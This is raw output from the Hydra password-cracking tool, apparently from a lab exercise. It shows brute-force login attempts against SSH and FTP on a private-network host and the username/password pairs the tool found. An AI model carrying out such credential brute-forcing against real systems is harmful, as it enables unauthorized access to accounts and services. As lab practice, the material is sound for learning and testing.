```
[ATTEMPT] target 192.168.1.70 - login "test_user" - pass "anna" - 115 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "chiara" - 116 of 208 [child 2] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "iphone" - 117 of 208 [child 0] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "admin" - 118 of 208 [child 1] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "kali" - 119 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "msfadmin" - 120 of 208 [child 2] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "quattro" - 121 of 208 [child 0] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "rosso " - 122 of 208 [child 1] (0/0) [ATTEMPT] target 192.168.1.70 - login "test_user" - pass "testpass" - 123 of 208 [child 1] (0/0) [22][ssh] host: 192.168.1.70 - login "test_user" - pass "testpass" - 123 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "alberto" - 130 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "alberto" - 130 of 208 [child 2] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "chiara" - 132 of 208 [child 1] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "chiara" - 132 of 208 [child 1] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "sinna" - 134 of 208 [child 2] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "sinna" - 134 of 208 [child 2] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "msfadmin" - 136 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "msfadmin" - 136 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "msfadmin" - 136 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "msfadmin" - 136 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "guattro" - 137 of 208 [child 3] (0/0) [ATTEMPT] target 192.168.1.70 - login "rosso " - pass "rosso " - 138 of 20
```

```
Target Passwords Tuning Specific Start
Output
Hydra v 9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, thes
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-17 09:34:36
[WARNING] the module adam6500 is work in progress! please submit a pcap of a successful login as well as false positives to vh@thc.org [WARNING] reset the number of parallel task to 1 for adam6500 modbus authentication
[ERROR] The redis, adam6500, cisco, oracle-listener, s7-300, snmp and vnc modules are only using the -p or -P option, not login (-l, -L) or colon file (-C).
Use the telnet module for cisco using "Username:" authentication.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, thes
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-17 09:35:35
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:13/p:16), ~13 tries per task
[DATA] attacking ftp://192.168.1.70:21/
[21][ftp] host: 192.168.1.70 login: kali password: kali
[21][ftp] host: 192.168.1.70 login: test_user password: testpass
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-17 09:36:23
<finished>
```